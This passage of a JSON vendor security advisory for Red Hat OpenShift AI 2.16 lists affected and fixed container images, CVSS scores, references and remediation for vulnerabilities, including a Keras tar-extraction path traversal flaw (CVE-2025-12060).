"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "trustyai-explainability: command injection via LMEvalJob CR"
},
{
"cve": "CVE-2025-12060",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-10-30T18:01:32.193676+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2407443"
}
],
"notes": [
{
"category": "description",
"text": "A path traversal flaw has been discovered in the keras Python library. when used with the extract=True option for tar archives, is vulnerable to a path traversal attack. The utility uses Python\u0027s tarfile.extractall function without the filter=\"data\" feature. A remote attacker can craft a malicious tar archive containing special symlinks, which, when extracted, allows them to write arbitrary files to any location on the filesystem outside of the intended destination folder.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "keras: Keras Path Traversal Vulnerability",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"known_not_affected": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2025-12060"
},
{
"category": "external",
"summary": "RHBZ#2407443",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2407443"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2025-12060",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12060"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-12060"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/pull/21760",
"url": "https://github.com/keras-team/keras/pull/21760"
},
{
"category": "external",
"summary": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9",
"url": "https://github.com/keras-team/keras/security/advisories/GHSA-hjqc-jx6g-rwp9"
}
],
"release_date": "2025-10-30T17:10:43.868000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-03-25T12:32:51+00:00",
"details": "For Red Hat OpenShift AI 2.16.4 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.redhat.com/en/documentation/red_hat_openshift_ai/",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:5807"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kf-notebook-controller-rhel8@sha256:b26f5118ae8e7e25783233698fe0d5df1e56cde8d75f745204d9f78c4d838412_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kuberay-operator-controller-rhel8@sha256:9855fe0311c11b91fa38d205a65c0ad41b9447267408b3e7eb8f9b4c1d727acf_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-kueue-controller-rhel8@sha256:f38932929d45522b0cfd9e2dd87682a3495688aad859b3a8dac51398860e0e95_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-api-server-v2-rhel8@sha256:c46e2392d44830fc612d1dc41ed953352dadcef696bc50a848d2cc5de694e1ca_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-driver-rhel8@sha256:0a30729330611926e635ec292bac2f5b7ce9f677aaff7f84b23549b2bbbd506d_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-launcher-rhel8@sha256:b82bbdac9d911544af8bc55ce7e688610be23cf6c31676af30fea76e3613d125_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-persistenceagent-v2-rhel8@sha256:9cfe909d46447d1dad8fd6a2319873d43b680b260d31f009eb086e22ad706f16_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-ml-pipelines-scheduledworkflow-v2-rhel8@sha256:87129d071d526f8e4fe597f23ea169bf3920e0d52b7a7698e8c5685ef84b8f4a_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mlmd-grpc-server-rhel8@sha256:07d85d51bfd8caddf447d7ea8c9b0c30879c03d8c3b9110cb86fc54e63ff0b48_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-mm-rest-proxy-rhel8@sha256:ace145ce198785d2b587c4206d915f3c0e0ebe0b051cdd16ccc82cbc74e11352_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-controller-rhel8@sha256:a880b9fd06cd7206e3397025371ba3a3655798be5d64bed620f3847ff6a0b5ac_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-operator-rhel8@sha256:8b7e95c316a28938a37b885d3e5c0503728add4b75066f3953430e5385dcacf5_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-model-registry-rhel8@sha256:14245353d924e3416f1b637ba1fec18a3218d9402965ff0acdfd2497e294f9ae_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-rhel8@sha256:abdb41f0a3c3f60094b48b2b69545968292446e3a609c42fdb51f27b4ef7ae81_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-runtime-adapter-rhel8@sha256:a291cd5f04c559fd16477ae2ad364a350c4bf0c5a3f5aa2e614260fd4a5bece2_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-modelmesh-serving-controller-rhel8@sha256:ae2514c29fedec9401a594ca3fe5e7ca132d23f2f2a1966b5f6cc7bb8b99d75b_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-notebook-controller-rhel8@sha256:aa551353c01d864361785cded067ec32e5bb3e478964aa540749b6a23f93b4db_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-operator-bundle@sha256:9407349c0fbf8d8be227d61d21e4ca9cc2d640c18ca040dfd94c33f0b1250f29_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-rhel8-operator@sha256:2e62a8a86b30347004012213f9af230d957cbb3f96771aa68490be6a3e22d949_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-training-operator-rhel8@sha256:6617c8beeb481dd39ae877b08361a377bc946fdf97787445bbec5bb3a0a0be1c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-operator-rhel8@sha256:297d22ca72b764328f7d0b85f7f7c013c91ca85d70f08be45a6689c85da6b311_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-trustyai-service-rhel8@sha256:92571ea118c1b28b480cd40c1006e8d057e959cd2fd8e01f300926ccadd46fc7_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "keras: Keras Path Traversal Vulnerability"
},
{
"cve": "CVE-2025-12638",
"cwe": {
"id": "CWE-22",
"name": "Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)"
},
"discovery_date": "2025-11-28T15:01:10.693633+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-codeflare-operator-rhel8@sha256:b68b73951beeabe942be43f65e778ff98e1cdfc6fdb4b052794f0cd4b191b819_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-dashboard-rhel8@sha256:022c21f044dead0ff28bfc5fb5fb2fd51f3ed8e1a6cfc90bd18222abf0388018_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-argoexec-rhel8@sha256:fd02f0f70e38c947cdc307be3d9660f87262d92c5a361fa1bf68f24a72c91476_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-argo-workflowcontroller-rhel8@sha256:4e77720ec7972239d2b5198afc01ebd5dd777a1f75c2d19dbfeeb44f7adf729c_amd64",
"Red Hat OpenShift AI 2.16:registry.redhat.io/rhoai/odh-data-science-pipelines-operator-controller-rhel8@sha256:64b60a2fcfb9806422127db0a7c42f665fa41f47cbe8fe2b98c6bc20b6a1bf28_amd64",
